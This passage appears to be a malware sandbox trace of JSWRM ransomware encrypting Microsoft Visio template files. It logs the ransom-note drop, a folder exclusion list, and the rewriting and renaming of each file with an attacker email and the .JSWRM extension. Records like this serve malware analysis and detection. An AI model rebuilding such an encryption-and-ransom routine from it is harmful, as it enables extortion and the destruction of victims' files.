lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.930] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0143.932] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.932] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0143.933] CloseHandle (hObject=0x238) returned 1 [0143.933] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\jswrm-decrypt.hta")) returned 0x20 [0143.933] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa326fd, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4cce0ca, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4c742f39, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName=".", cAlternateFileName="")) returned 0x232040 [0143.933] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0143.934] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa326fd, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4cce0ca, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4c742f39, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="..", cAlternateFileName="")) returned 1 [0143.937] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0143.937] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0143.937] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x48ee499, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x48ee499, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x48ee499, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x83bf, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="ACTDIR_M.VSTX", cAlternateFileName="ACTDIR~1.VST")) returned 1 [0143.937] lstrcmpiW (lpString1="ACTDIR_M.VSTX", lpString2=".") returned 1 [0143.937] lstrcmpiW (lpString1="ACTDIR_M.VSTX", lpString2="..") returned 1 [0143.937] lstrcmpiW (lpString1="ACTDIR_M.VSTX", lpString2="...") returned 1 [0143.937] lstrcmpiW (lpString1="ACTDIR_M.VSTX", lpString2="windows") returned -1 [0143.937] lstrcmpiW (lpString1="ACTDIR_M.VSTX", lpString2="recovery") returned -1 [0143.937] lstrcmpiW (lpString1="ACTDIR_M.VSTX", lpString2="perflogs") returned -1 [0143.937] lstrcmpiW (lpString1="ACTDIR_M.VSTX", lpString2="documents and settings") returned -1 [0143.937] lstrcmpiW (lpString1="ACTDIR_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0143.937] lstrcmpiW (lpString1="ACTDIR_M.VSTX", lpString2="system volume information") returned -1 [0143.937] lstrcmpiW (lpString1="ACTDIR_M.VSTX", lpString2="msocache") returned -1 [0143.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACTDIR_M.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0143.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACTDIR_M.VSTX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACTDIR_M.VSTX", lpUsedDefaultChar=0x0) returned 13 [0143.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACTDIR_M.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0143.938] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACTDIR_M.VSTX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACTDIR_M.VSTX", lpUsedDefaultChar=0x0) returned 13 [0143.938] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.938] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.938] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ACTDIR_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\actdir_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0143.938] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=33727) returned 1 [0143.939] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.939] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x83b0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x83b0, lpOverlapped=0x0) returned 1 [0143.943] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.943] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x83b0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x83b0, lpOverlapped=0x0) returned 1 [0143.944] CloseHandle (hObject=0x314) returned 1 [0143.944] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ACTDIR_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\actdir_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ACTDIR_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\actdir_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.945] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x49145b3, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x49145b3, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x49145b3, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x82ee, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="ACTDIR_U.VSTX", cAlternateFileName="ACTDIR~2.VST")) returned 1 [0143.945] lstrcmpiW (lpString1="ACTDIR_U.VSTX", lpString2=".") returned 1 [0143.945] lstrcmpiW (lpString1="ACTDIR_U.VSTX", lpString2="..") returned 1 [0143.945] lstrcmpiW (lpString1="ACTDIR_U.VSTX", lpString2="...") returned 1 [0143.946] lstrcmpiW (lpString1="ACTDIR_U.VSTX", lpString2="windows") returned -1 [0143.946] lstrcmpiW (lpString1="ACTDIR_U.VSTX", lpString2="recovery") returned -1 [0143.946] lstrcmpiW (lpString1="ACTDIR_U.VSTX", lpString2="perflogs") returned -1 [0143.946] lstrcmpiW (lpString1="ACTDIR_U.VSTX", lpString2="documents and settings") returned -1 [0143.946] lstrcmpiW (lpString1="ACTDIR_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0143.946] lstrcmpiW (lpString1="ACTDIR_U.VSTX", lpString2="system volume information") returned -1 [0143.946] lstrcmpiW (lpString1="ACTDIR_U.VSTX", lpString2="msocache") returned -1 [0143.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACTDIR_U.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0143.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACTDIR_U.VSTX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACTDIR_U.VSTX", lpUsedDefaultChar=0x0) returned 13 [0143.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACTDIR_U.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0143.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACTDIR_U.VSTX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACTDIR_U.VSTX", lpUsedDefaultChar=0x0) returned 13 [0143.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.946] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ACTDIR_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\actdir_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0143.947] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=33518) returned 1 [0143.947] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.948] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x82e0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x82e0, lpOverlapped=0x0) returned 1 [0143.952] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.952] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x82e0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x82e0, lpOverlapped=0x0) returned 1 [0143.952] CloseHandle (hObject=0x314) returned 1 [0143.952] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ACTDIR_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\actdir_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ACTDIR_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\actdir_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.953] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x49145b3, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x49145b3, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x49145b3, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x17938, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="ACTUAL_FINISHDATES_GANTTCHART_M.VSTX", cAlternateFileName="ACTUAL~1.VST")) returned 1 [0143.953] lstrcmpiW (lpString1="ACTUAL_FINISHDATES_GANTTCHART_M.VSTX", lpString2=".") returned 1 [0143.953] lstrcmpiW (lpString1="ACTUAL_FINISHDATES_GANTTCHART_M.VSTX", lpString2="..") returned 1 [0143.953] lstrcmpiW (lpString1="ACTUAL_FINISHDATES_GANTTCHART_M.VSTX", lpString2="...") returned 1 [0143.953] lstrcmpiW (lpString1="ACTUAL_FINISHDATES_GANTTCHART_M.VSTX", lpString2="windows") returned -1 [0143.953] lstrcmpiW (lpString1="ACTUAL_FINISHDATES_GANTTCHART_M.VSTX", lpString2="recovery") returned -1 [0143.953] lstrcmpiW (lpString1="ACTUAL_FINISHDATES_GANTTCHART_M.VSTX", lpString2="perflogs") returned -1 [0143.953] lstrcmpiW (lpString1="ACTUAL_FINISHDATES_GANTTCHART_M.VSTX", lpString2="documents and settings") returned -1 [0143.953] lstrcmpiW (lpString1="ACTUAL_FINISHDATES_GANTTCHART_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0143.953] lstrcmpiW (lpString1="ACTUAL_FINISHDATES_GANTTCHART_M.VSTX", lpString2="system volume information") returned -1 [0143.953] lstrcmpiW (lpString1="ACTUAL_FINISHDATES_GANTTCHART_M.VSTX", lpString2="msocache") returned -1 [0143.953] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACTUAL_FINISHDATES_GANTTCHART_M.VSTX", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0143.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACTUAL_FINISHDATES_GANTTCHART_M.VSTX", cchWideChar=36, lpMultiByteStr=0x22d260, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACTUAL_FINISHDATES_GANTTCHART_M.VSTX", lpUsedDefaultChar=0x0) returned 36 [0143.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACTUAL_FINISHDATES_GANTTCHART_M.VSTX", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0143.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACTUAL_FINISHDATES_GANTTCHART_M.VSTX", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACTUAL_FINISHDATES_GANTTCHART_M.VSTX", lpUsedDefaultChar=0x0) returned 36 [0143.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.954] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ACTUAL_FINISHDATES_GANTTCHART_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\actual_finishdates_ganttchart_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0143.954] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=96568) returned 1 [0143.955] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.955] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x17930, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x17930, lpOverlapped=0x0) returned 1 [0143.965] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.965] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x17930, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x17930, lpOverlapped=0x0) returned 1 [0143.966] CloseHandle (hObject=0x314) returned 1 [0143.966] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ACTUAL_FINISHDATES_GANTTCHART_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\actual_finishdates_ganttchart_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ACTUAL_FINISHDATES_GANTTCHART_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\actual_finishdates_ganttchart_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.968] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x49145b3, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x49145b3, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x49145b3, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x1a328, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="ACTUAL_FINISHDATES_GANTTCHART_U.VSTX", cAlternateFileName="ACTUAL~2.VST")) returned 1 [0143.968] lstrcmpiW (lpString1="ACTUAL_FINISHDATES_GANTTCHART_U.VSTX", lpString2=".") returned 1 [0143.968] lstrcmpiW (lpString1="ACTUAL_FINISHDATES_GANTTCHART_U.VSTX", lpString2="..") returned 1 [0143.968] lstrcmpiW (lpString1="ACTUAL_FINISHDATES_GANTTCHART_U.VSTX", lpString2="...") returned 1 [0143.968] lstrcmpiW (lpString1="ACTUAL_FINISHDATES_GANTTCHART_U.VSTX", lpString2="windows") returned -1 [0143.968] lstrcmpiW (lpString1="ACTUAL_FINISHDATES_GANTTCHART_U.VSTX", lpString2="recovery") returned -1 [0143.968] lstrcmpiW (lpString1="ACTUAL_FINISHDATES_GANTTCHART_U.VSTX", lpString2="perflogs") returned -1 [0143.968] lstrcmpiW (lpString1="ACTUAL_FINISHDATES_GANTTCHART_U.VSTX", lpString2="documents and settings") returned -1 [0143.968] lstrcmpiW (lpString1="ACTUAL_FINISHDATES_GANTTCHART_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0143.968] lstrcmpiW (lpString1="ACTUAL_FINISHDATES_GANTTCHART_U.VSTX", lpString2="system volume information") returned -1 [0143.968] lstrcmpiW (lpString1="ACTUAL_FINISHDATES_GANTTCHART_U.VSTX", lpString2="msocache") returned -1 [0143.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACTUAL_FINISHDATES_GANTTCHART_U.VSTX", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0143.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACTUAL_FINISHDATES_GANTTCHART_U.VSTX", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACTUAL_FINISHDATES_GANTTCHART_U.VSTX", lpUsedDefaultChar=0x0) returned 36 [0143.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACTUAL_FINISHDATES_GANTTCHART_U.VSTX", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0143.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACTUAL_FINISHDATES_GANTTCHART_U.VSTX", cchWideChar=36, lpMultiByteStr=0x22ce70, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACTUAL_FINISHDATES_GANTTCHART_U.VSTX", lpUsedDefaultChar=0x0) returned 36 [0143.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.968] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ACTUAL_FINISHDATES_GANTTCHART_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\actual_finishdates_ganttchart_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0143.970] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=107304) returned 1 [0143.970] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.970] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x1a320, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x1a320, lpOverlapped=0x0) returned 1 [0143.980] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.980] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x1a320, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x1a320, lpOverlapped=0x0) returned 1 [0143.981] CloseHandle (hObject=0x314) returned 1 [0143.981] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ACTUAL_FINISHDATES_GANTTCHART_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\actual_finishdates_ganttchart_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ACTUAL_FINISHDATES_GANTTCHART_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\actual_finishdates_ganttchart_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.982] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1e76730, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1e76730, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1e76730, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x2d03a, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="ADO_M.VSSX", cAlternateFileName="ADO_M~1.VSS")) returned 1 [0143.982] lstrcmpiW (lpString1="ADO_M.VSSX", lpString2=".") returned 1 [0143.982] lstrcmpiW (lpString1="ADO_M.VSSX", lpString2="..") returned 1 [0143.982] lstrcmpiW (lpString1="ADO_M.VSSX", lpString2="...") returned 1 [0143.982] lstrcmpiW (lpString1="ADO_M.VSSX", lpString2="windows") returned -1 [0143.982] lstrcmpiW (lpString1="ADO_M.VSSX", lpString2="recovery") returned -1 [0143.982] lstrcmpiW (lpString1="ADO_M.VSSX", lpString2="perflogs") returned -1 [0143.982] lstrcmpiW (lpString1="ADO_M.VSSX", lpString2="documents and settings") returned -1 [0143.982] lstrcmpiW (lpString1="ADO_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0143.982] lstrcmpiW (lpString1="ADO_M.VSSX", lpString2="system volume information") returned -1 [0143.982] lstrcmpiW (lpString1="ADO_M.VSSX", lpString2="msocache") returned -1 [0143.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ADO_M.VSSX", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0143.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ADO_M.VSSX", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ADO_M.VSSX", lpUsedDefaultChar=0x0) returned 10 [0143.982] WideCharToMultiByte 